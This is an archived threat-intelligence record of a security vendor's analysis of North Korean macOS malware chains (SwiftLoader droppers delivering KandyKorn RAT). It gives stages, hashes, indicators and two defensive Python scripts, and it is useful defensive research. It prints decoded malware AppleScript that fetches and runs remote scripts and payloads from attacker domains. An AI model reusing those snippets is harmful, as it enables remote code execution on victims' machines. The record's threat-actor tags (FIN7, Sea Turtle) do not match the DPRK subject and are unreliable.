{
	"id": "d734d81f-3704-468b-ba05-ad64f4e566fa",
	"created_at": "2026-04-06T00:14:47.048903Z",
	"updated_at": "2026-04-10T13:12:47.166002Z",
	"deleted_at": null,
	"sha1_hash": "2a4321fdcddd7640c9c4c60ed54d73d030eaefe5",
	"title": "DPRK Crypto Theft | macOS RustBucket Droppers Pivot to Deliver KandyKorn Payloads",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2858251,
	"plain_text": "DPRK Crypto Theft | macOS RustBucket Droppers Pivot to Deliver KandyKorn Payloads\r\nBy Phil Stokes\r\nPublished: 2023-11-27 · Archived: 2026-04-05 18:37:53 UTC\r\nNorth Korean-aligned threat actors targeting macOS have had a busy 2023, with two major campaigns noted so far: RustBucket and KandyKorn. The initial RustBucket campaign used a second-stage malware, dubbed ‘SwiftLoader’, which presented itself as a PDF viewer for a lure document sent to targets. While the victim viewed the lure, SwiftLoader retrieved and executed a further-stage malware written in Rust. The KandyKorn campaign, meanwhile, was an elaborate multi-stage operation targeting blockchain engineers at a crypto exchange platform. Python scripts were used to drop malware that hijacked the host’s installed Discord app and subsequently delivered a backdoor RAT written in C++, dubbed ‘KandyKorn’.\r\nOur analysis of further activity in these campaigns suggests that DPRK threat actors are now ‘mixing and matching’ components from these operations, with SwiftLoader droppers being used to deliver KandyKorn payloads. In this post, we review this activity in detail and provide further indicators to help security teams defend their organizations.\r\nOverview of KandyKorn\r\nResearch by Elastic published in early November 2023 described a sophisticated intrusion by DPRK-aligned threat actors. The compromise involved a five-stage attack that began with social engineering via Discord to trick targets into downloading a malicious Python application disguised as a cryptocurrency arbitrage bot, a popular tool among crypto traders. The Python application was distributed as Cross-Platform Bridges.zip and contained multiple benign Python scripts.\r\nhttps://www.sentinelone.com/blog/dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads/\r\nPage 1 of 9\r\n
We summarize the previous research into KandyKorn as follows:\r\nOverview of Operation KandyKorn\r\nStage 0\r\nA Discord user is socially engineered into downloading a malicious Python application, Cross-Platform Bridges.zip. Initially, links to the malware were sent to targets via direct message, with the malware hosted on Google Drive.\r\nhttps[:]\r\nThe application’s Main.py script imports the included Watcher.py file as a module.\r\nStage 1\r\nWatcher.py checks the local Python version, then downloads and executes testSpeed.py. That script in turn downloads and executes another Python script, FinderTools. testSpeed.py is deleted after execution, while FinderTools is written to /Users/Shared/FinderTools.\r\nStage 2\r\nFinderTools downloads and executes a Mach-O binary, dubbed SUGARLOADER, at /Users/Shared/.sld. The same file is also copied twice, as .log and as appname, both inside the Discord application bundle at /Applications/Discord.app/Contents/MacOS/.\r\nWritten in C++, SUGARLOADER checks for the existence of a configuration file at /Library/Caches/com.apple.safari.ck and downloads it from a remote C2 if it is missing. The C2 address is hardcoded into the FinderTools script and passed to the SUGARLOADER binary as a command-line argument.\r\nIn the intrusion seen by Elastic, the C2 used by FinderTools was hosted on the domain tp-globa[.]xyz:\r\ntp-globa[.]xyz/OdhLca1mLUp/lZ5rZPxWsh/7yZKYQI43S/fP7savDX6c/bfC\r\nStage 3\r\nSUGARLOADER also downloads a Mach-O payload dubbed HLOADER and writes it to /Applications/Discord.app/Contents/MacOS/Discord. 
The genuine Discord executable is renamed to .lock in the same directory.\r\nAfter this replacement, when Discord is launched, HLOADER renames itself to MacOS.tmp, renames the .lock file back to Discord, and executes both the genuine Discord binary and the SUGARLOADER copy saved as .log. The swap is then re-established, so the entire rename-and-reload sequence repeats on the next launch.\r\nOn the assumption that the victim is likely to launch Discord frequently, HLOADER provides a persistence mechanism that needs no login item or launch agent, and so does not trigger the notifications macOS shows when background login items are added.\r\nStage 4\r\nSUGARLOADER retrieves a C2 URL from the configuration file previously stored as com.apple.safari.ck. In the observed intrusion this was 23.254.226[.]90, communicating over TCP port 44.\r\nSUGARLOADER uses this to retrieve the KANDYKORN remote access trojan and execute it in memory via the dyld functions NSCreateObjectFileImageFromMemory and NSLinkModule, linking the Mach-O from a memory buffer rather than launching it as a file on disk. This technique has been used previously in North Korean macOS malware, starting with UnionCryptoTrader back in 2019.\r\nBuilding on Elastic’s research, we identified a number of other versions of KANDYKORN RAT, with the following SHA1s:\r\nSHA1                                       First Seen\r\n62267b88fa6393bc1f1eeb778e4da6b564b7011e   Apr 2023\r\n8f6c52d7e82fbfdead3d66ad8c52b372cc9e8b18   Apr 2023\r\nac336c5082c2606ab8c3fb023949dfc0db2064d5   Apr 2023\r\n26ec4630b4d1116e131c8e2002e9a3ec7494a5cf   Aug 2023\r\n46ac6dc34fc164525e6f7886c8ed5a79654f3fd3   Aug 2023\r\n8d5d214c490eae8f61325839fcc17277e514301e   Aug 2023\r\n9f97edbc1454ef66d6095f979502d17067215a9d   Aug 2023\r\nc45f514a252632cb3851fe45bed34b175370d594   Aug 2023\r\nce3705baf097cd95f8f696f330372dd00996d29a   Aug 2023\r\ne244ff1d8e66558a443610200476f98f653b8519   Aug 2023\r\ne77270ac0ea05496dd5a2fbccba3e24eb9b863d9   Aug 2023\r\ne68bfa72a4b4289a4cc688e81f9282b1f78ebc1f   Nov 2023\r\nInteresting 
among these is 26ec4630b4d1116e131c8e2002e9a3ec7494a5cf, which is written to /Users/Shared/.pld, a point we return to below.\r\nRecent RustBucket activity\r\nIn what at first sight appears to be an entirely separate operation, North Korean threat actors are running an ongoing and evolving campaign, first disclosed by Jamf, dubbed RustBucket. This campaign initially involved a first-stage AppleScript applet and a Swift-based application bundle called ‘Internal PDF Viewer.app’, which used specially crafted PDFs to unlock code for downloading a Rust-based payload.\r\n#Lazarus #APT\r\nLooks like the target is Apple developers.\r\n8a8de435d71cb0b0ae6d4b15d58b7c85ce3ef8f06b24266c52b2bc49217be257 https://t.co/aXVCAFpVP4\r\n— 2ero (@BaoshengbinCumt) November 10, 2023\r\nA number of RustBucket variants have since been sighted. Additionally, several variations of the Swift-based stager, collectively dubbed SwiftLoader, have come to light over the last few months.\r\nWhile some of these continued to be distributed under the name “Internal PDF Viewer”, in June researchers spotted a variant called SecurePDF Viewer.app. This application was signed by a developer named “BBQ BAZAAR PRIVATE LIMITED (7L2UQTVP6F)” and notarized by Apple (since revoked). SecurePDF Viewer.app requires at least macOS 12.6 (Monterey), has the bundle identifier com.softwaredev.swift-ui-test, and runs on both Intel and Apple silicon Macs.\r\nThe main executable uses curl to reach out to docs-send[.]online/getBalance/usdt/ethereum. 
This retrieves a file called /gatewindow/1027/shared/ (c806c7006950dea6c20d3d2800fe46d9350266b6), an AppleScript that, when executed, posts the path of the running executable to a remote server hosted on swissborg[.]blog and then runs whatever AppleScript the server returns:\r\nset sdf to (POSIX path of (path to me))\r\nset aaas to do shell script \"curl -H \\\"Content-Type:application/json\\\" -d '{\\\"zip\\\":\\\"\" \u0026 sdf \u0026 \"\\\"}' https[:]//swissborg[.]blog/tx/10299301992/hash\"\r\nrun script aaas\r\nThe path is sent as the zip field of a JSON POST body, and the HTTP response is handed straight to run script, so the server decides what the next stage is.\r\nConnection to ObjCShellz\r\nThe swissborg[.]blog domain contacted by SecurePDF Viewer was previously mentioned by Jamf in an article in early November.\r\nJamf researchers described what appeared to them to be a late-stage RustBucket payload distributed as a Mach-O binary called ProcessRequest. They dubbed the malware ObjCShellz, since the code is written in Objective-C and does little more than execute shell commands received from a remote C2 via the system() function, which invokes sh -c.\r\nOur research shows that ObjCShellz is highly likely a later stage of the SwiftLoader SecurePDF Viewer.app.\r\nSwiftLoader Connection to KandyKorn RAT\r\nOther versions of SwiftLoader have been spotted in the wild, including one distributed in a lure called Crypto-assets and their risks for financial stability[.]app[.]zip. This application was also signed by a developer, in this case named “Northwest Tech-Con Systems Ltd (2C4CB2P247)”, and notarized by Apple (since revoked). 
The bundle identifier is com.EdoneViewer and the app’s main executable is EdoneViewer.\r\nThere are some interesting overlaps between this version of SwiftLoader and the KandyKorn operation.\r\nOur analysis of EdoneViewer shows that it contains a hardcoded URL encoded with a single-byte XOR key of 0x40.\r\nOnce decoded, we can see that the malware reaches out to the domain on-global[.]xyz and drops a hidden executable at /Users/Shared/.pw. The relevant part of the decoded AppleScript:\r\nD%3D\", \"http[:]//on-global[.]xyz/Of56cYsfVV8/OJITWH2WFx/Jy5S7hSx0K/fP7saoiPBc/A%3D%3D\",\r\n\"/users/shared/Crypto-assets and their risks for financial stability.pdf\", \"/users/shared/.pw\"}\r\ndo shell script \"curl -o \\\"\" \u0026 p \u0026 \"\\\" \" \u0026 d \u0026 a \u0026 \"\u0026\u0026 open \\\"\" \u0026 p \u0026 \"\\\"\" \u0026 \"\u0026\u0026\r\ncurl -o \" \u0026 b \u0026 \" \" \u0026 s \u0026 a \u0026 \" -d pw\" \u0026 \"\u0026\u0026 chmod 770 \" \u0026 b \u0026 \"\u0026\u0026\r\n/bin/zsh -c \\\"\" \u0026 b \u0026 \" \" \u0026 s \u0026 \" \u0026\\\" \u0026\u003e /dev/null\"\r\nThe script downloads the lure PDF to /users/shared and opens it for the victim, fetches the .pw payload with a POST body of pw, makes it executable with chmod 770, and launches it in the background through /bin/zsh -c with the hardcoded URL as its argument, discarding all output to /dev/null.\r\nWe note that the KandyKorn Python script FinderTools fetched its next stage from the domain tp-globa[.]xyz and that SUGARLOADER dropped a hidden file at /Users/Shared/.sld; the EdoneViewer stager’s on-global[.]xyz domain and /Users/Shared/.pw drop follow the same pattern.\r\nThe .pw executable, named download.bin on VirusTotal (060a5d189ccf3fc32a758f1e218f814f6ce81744), takes the URL hardcoded in the EdoneViewer binary as a launch argument. Unfortunately, the C2 did not respond with a download during our test, but the file contains a hardcoded reference to /Users/Shared/.pld.\r\nRecall that we discovered a variant of KANDYKORN RAT that uses the same file name, .pld (26ec4630b4d1116e131c8e2002e9a3ec7494a5cf). 
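Recovering a C2 URL hidden behind a single-byte XOR, as in the EdoneViewer stager described above, is a routine triage step. The following Python is an added example and not code from this post or from SentinelOne: it brute-forces all 256 keys over a byte buffer and reports every offset at which an http or https marker decodes. The buffer it runs on is constructed here (the defanged on-global[.]xyz URL from above, XOR-encoded with 0x40 together with its NUL terminator and padded with filler) and is not a byte-accurate copy of the binary; scan_file is a convenience wrapper for running the same scan over a real Mach-O.

```python
# Added example (not SentinelOne code): recover a C2 URL hidden behind a
# single-byte XOR, as in the EdoneViewer stager (key 0x40). SAMPLE_BLOB is
# constructed below and is not a byte-accurate copy of the binary.

MARKERS = (b'https://', b'http://')


def xor_bytes(data, key):
    # single-byte XOR is its own inverse: one function encodes and decodes
    return bytes(b ^ key for b in data)


def printable_run(buf, start, limit=512):
    # extend from start over bytes that can appear in a URL (0x21..0x7e);
    # a NUL terminator that was XOR-encoded with the string decodes back to
    # 0x00 and ends the run
    end = start
    while end < len(buf) and end - start < limit and 0x21 <= buf[end] <= 0x7e:
        end += 1
    return buf[start:end].decode('ascii')


def recover_urls(blob, keys=range(256)):
    # brute-force every key (key 0 reports plaintext URLs too) and return
    # (key, offset, url) for each decoded http(s) marker
    hits = []
    for key in keys:
        dec = xor_bytes(blob, key)
        for marker in MARKERS:
            pos = dec.find(marker)
            while pos != -1:
                hits.append((key, pos, printable_run(dec, pos)))
                pos = dec.find(marker, pos + 1)
    return hits


def scan_file(path):
    # run the same scan over a real Mach-O (or any file) on disk
    with open(path, 'rb') as fh:
        return recover_urls(fh.read())


# constructed sample: 16 bytes of filler, then the defanged on-global[.]xyz
# URL plus its NUL terminator encoded with 0x40, then 8 bytes of 0xff filler
C2_URL = 'http://on-global[.]xyz/Of56cYsfVV8/OJITWH2WFx/Jy5S7hSx0K/fP7saoiPBc/A%3D%3D'
SAMPLE_BLOB = (bytes(range(16))
               + xor_bytes(C2_URL.encode('ascii') + bytes(1), 0x40)
               + bytes([0xff] * 8))

if __name__ == '__main__':
    for key, offset, url in recover_urls(SAMPLE_BLOB):
        print(hex(key), offset, url)
```

Trying every key rather than only 0x40 is deliberate: a rebuilt stager can change the key without changing anything else, and key 0 surfaces plaintext URLs alongside the encoded ones. A seven-byte marker surviving a wrong key is rare even across a large binary, so every hit deserves a look; the decoded run after the marker is only as trustworthy as the terminator that ended it.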
We assess with medium confidence that this /Users/Shared/.pld reference points to the same .pld KandyKorn RAT, given the overlaps in infrastructure, objectives and TTPs noted here and by the researchers cited above.\r\nSentinelOne Customers Protected from KandyKorn and RustBucket Malware\r\nSentinelOne Singularity detects and protects against all known components of KandyKorn and RustBucket malware.\r\nConclusion\r\nOur analysis has established new connections between previous research findings. We note specific shared infrastructure that links ObjCShellz payloads to SwiftLoader stagers. We also provide the first clues that RustBucket droppers and KandyKorn payloads are likely being shared as part of the same infection chain.\r\nOur analysis corroborates other researchers’ finding that North Korean-linked threat actors tend to reuse shared infrastructure, which gives defenders the opportunity to widen their understanding of this activity and discover fresh indicators of compromise. 
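The file paths in this research are most useful when a responder can sweep a fleet for them. The following Python is an added example, not code from this post or from SentinelOne: it classifies a list of paths against the artifacts described above, comparing them case-insensitively because a default APFS volume is case-insensitive, and adds two broader heuristics that are this example’s own assumptions rather than indicators from the post: any entry other than the Discord executable in Discord.app/Contents/MacOS (on the assumption that a stock bundle carries only that one file there), and any dot-file directly under /Users/Shared. The severity labels are likewise the example’s own, SAMPLE_LISTING is a constructed directory listing, and enumerate_live reads the real directories when the script is run on a Mac.

```python
# Added example (not SentinelOne code): sweep a macOS host for the on-disk
# artifacts this research attributes to SUGARLOADER, HLOADER and the
# SwiftLoader droppers. SAMPLE_LISTING is a constructed directory listing.
import os

# keys are lower-case: the default APFS and HFS+ volumes are case-insensitive,
# and the EdoneViewer script itself writes /users/shared in lower case.
# Severity labels are this example's own choice, not part of the research.
KNOWN_ARTIFACTS = {
    '/users/shared/findertools': ('high', 'KandyKorn stage 1 script (FinderTools)'),
    '/users/shared/.sld': ('high', 'SUGARLOADER drop'),
    '/users/shared/.pld': ('high', 'KANDYKORN RAT drop'),
    '/users/shared/.pw': ('high', 'SwiftLoader (EdoneViewer) downloader drop'),
    '/users/shared/crypto-assets and their risks for financial stability.pdf':
        ('medium', 'lure document opened by EdoneViewer'),
    '/library/caches/com.apple.safari.ck': ('high', 'SUGARLOADER C2 configuration'),
    '/applications/discord.app/contents/macos/.log': ('high', 'SUGARLOADER copy run by HLOADER'),
    '/applications/discord.app/contents/macos/appname': ('high', 'SUGARLOADER copy inside Discord.app'),
    '/applications/discord.app/contents/macos/.lock': ('high', 'genuine Discord binary renamed by HLOADER'),
    '/applications/discord.app/contents/macos/macos.tmp': ('high', 'HLOADER renamed at Discord launch'),
}
DISCORD_MACOS = '/applications/discord.app/contents/macos/'
SHARED = '/users/shared/'
LIVE_ROOTS = ('/Users/Shared', '/Library/Caches',
              '/Applications/Discord.app/Contents/MacOS')


def classify(path):
    # exact indicator first, then two broader heuristics that are assumptions
    # of this example rather than indicators from the post: anything other
    # than the Discord executable in its MacOS directory, and any dot-file
    # directly under /Users/Shared
    key = path.lower()
    if key in KNOWN_ARTIFACTS:
        return KNOWN_ARTIFACTS[key]
    if key.startswith(DISCORD_MACOS) and key != DISCORD_MACOS + 'discord':
        return ('medium', 'unexpected entry in Discord.app/Contents/MacOS')
    if key.startswith(SHARED) and os.path.basename(key).startswith('.'):
        return ('medium', 'hidden file in /Users/Shared')
    return None


def sweep(paths):
    # (severity, path, reason) for every path that matches, in input order
    findings = []
    for path in paths:
        verdict = classify(path)
        if verdict is not None:
            findings.append((verdict[0], path, verdict[1]))
    return findings


def enumerate_live(roots=LIVE_ROOTS):
    # direct children of each root that exists; a missing root (no Discord
    # installed, or a non-macOS host) is skipped rather than reported
    paths = []
    for root in roots:
        if os.path.isdir(root):
            for name in os.listdir(root):
                paths.append(os.path.join(root, name))
    return paths


SAMPLE_LISTING = [
    '/Users/Shared/FinderTools',
    '/Users/Shared/.sld',
    '/Users/Shared/.pld',
    '/Users/Shared/Crypto-assets and their risks for financial stability.pdf',
    '/Users/Shared/.cache_x',
    '/Users/Shared/notes.txt',
    '/Library/Caches/com.apple.safari.ck',
    '/Applications/Discord.app/Contents/MacOS/Discord',
    '/Applications/Discord.app/Contents/MacOS/.lock',
    '/Applications/Discord.app/Contents/MacOS/.log',
    '/Applications/Discord.app/Contents/MacOS/appname',
]

if __name__ == '__main__':
    for severity, path, reason in sweep(SAMPLE_LISTING) + sweep(enumerate_live()):
        print(severity, path, reason)
```

A hit on the Discord.app heuristic should be checked against a clean install of the same Discord version before anyone acts on it. The sweep also says nothing about the KANDYKORN stage itself, which the post describes as loaded in memory, so pair it with a check for connections to the C2 addresses listed below.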
Below we provide a list of the indicators we observed and analyzed in this research.\r\nIndicators of Compromise\r\nSUGARLOADER\r\nd28830d87fc71091f003818ef08ff0b723b3f358\r\nHLOADER\r\n43f987c15ae67b1183c4c442dc3b784faf2df090\r\nKANDYKORN RAT\r\n26ec4630b4d1116e131c8e2002e9a3ec7494a5cf\r\n46ac6dc34fc164525e6f7886c8ed5a79654f3fd3\r\n62267b88fa6393bc1f1eeb778e4da6b564b7011e\r\n8d5d214c490eae8f61325839fcc17277e514301e\r\n8f6c52d7e82fbfdead3d66ad8c52b372cc9e8b18\r\n9f97edbc1454ef66d6095f979502d17067215a9d\r\nac336c5082c2606ab8c3fb023949dfc0db2064d5\r\nc45f514a252632cb3851fe45bed34b175370d594\r\nce3705baf097cd95f8f696f330372dd00996d29a\r\ne244ff1d8e66558a443610200476f98f653b8519\r\ne68bfa72a4b4289a4cc688e81f9282b1f78ebc1f\r\ne77270ac0ea05496dd5a2fbccba3e24eb9b863d9\r\nObjCShellz\r\n79337ccda23c67f8cfd9f43a6d3cf05fd01d1588\r\nSecurePDF Viewer\r\na1a8a855f64a6b530f5116a3785a693d78ec09c0\r\ne275deb68cdff336cb4175819a09dbaf0e1b68f6\r\nCrypto-assets and their risks for financial stability.app\r\n09ade0cb777f4a4e0682309a4bc1d0f7d4d7a036\r\n5c93052713f317431bf232a2894658a3a4ebfad9\r\n884cebf1ad0e65f4da60c04bc31f62f796f90d79\r\nbe903ded39cbc8332cefd9ebbe7a66d95e9d6522\r\nDownloader (.pw, download.bin)\r\n060a5d189ccf3fc32a758f1e218f814f6ce81744\r\nRemotely-hosted AppleScript\r\n3c887ece654ea46b1778d3c7a8a6a7c7c7cfa61c\r\nc806c7006950dea6c20d3d2800fe46d9350266b6\r\nNetwork Communications\r\nhttp[:]\r\nhttps[:]\r\nhttp[:]\r\nhttp[:]\r\nhttp[:]\r\n23.254.226[.]90\r\n104.168.214[.]151\r\n142.11.209[.]144\r\n192.119.64[.]43\r\nFile paths\r\n/Applications/Discord.app/Contents/MacOS/.log\r\n/Applications/Discord.app/Contents/MacOS/appname\r\n/Library/Caches/com.apple.safari.ck\r\n/tmp/tempXXXXXX\r\n/Users/Shared/.pld\r\n/Users/Shared/.pw\r\n/Users/Shared/.sld\r\nSource: https://www.sentinelone.com/blog/dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.sentinelone.com/blog/dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads/"
	],
	"report_names": [
		"dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads"
	],
	"threat_actors": [
		{
			"id": "9de1979b-40fc-44dc-855d-193edda4f3b8",
			"created_at": "2025-08-07T02:03:24.92723Z",
			"updated_at": "2026-04-10T02:00:03.755516Z",
			"deleted_at": null,
			"main_name": "GOLD LOCUST",
			"aliases": [
				"Anunak",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Silicon "
			],
			"source_name": "Secureworks:GOLD LOCUST",
			"tools": [
				"Carbanak"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "cfdd35af-bd12-4c03-8737-08fca638346d",
			"created_at": "2022-10-25T16:07:24.165595Z",
			"updated_at": "2026-04-10T02:00:04.887031Z",
			"deleted_at": null,
			"main_name": "Sea Turtle",
			"aliases": [
				"Cosmic Wolf",
				"Marbled Dust",
				"Silicon",
				"Teal Kurma",
				"UNC1326"
			],
			"source_name": "ETDA:Sea Turtle",
			"tools": [
				"Drupalgeddon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "33ae2a40-02cd-4dba-8461-d0a50e75578b",
			"created_at": "2023-01-06T13:46:38.947314Z",
			"updated_at": "2026-04-10T02:00:03.155091Z",
			"deleted_at": null,
			"main_name": "Sea Turtle",
			"aliases": [
				"UNC1326",
				"COSMIC WOLF",
				"Marbled Dust",
				"SILICON",
				"Teal Kurma"
			],
			"source_name": "MISPGALAXY:Sea Turtle",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "62b1b01f-168d-42db-afa1-29d794abc25f",
			"created_at": "2025-04-23T02:00:55.22426Z",
			"updated_at": "2026-04-10T02:00:05.358041Z",
			"deleted_at": null,
			"main_name": "Sea Turtle",
			"aliases": [
				"Sea Turtle",
				"Teal Kurma",
				"Marbled Dust",
				"Cosmic Wolf",
				"SILICON"
			],
			"source_name": "MITRE:Sea Turtle",
			"tools": [
				"SnappyTCP"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434487,
	"ts_updated_at": 1775826767,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2a4321fdcddd7640c9c4c60ed54d73d030eaefe5.pdf",
		"text": "https://archive.orkl.eu/2a4321fdcddd7640c9c4c60ed54d73d030eaefe5.txt",
		"img": "https://archive.orkl.eu/2a4321fdcddd7640c9c4c60ed54d73d030eaefe5.jpg"
	}
}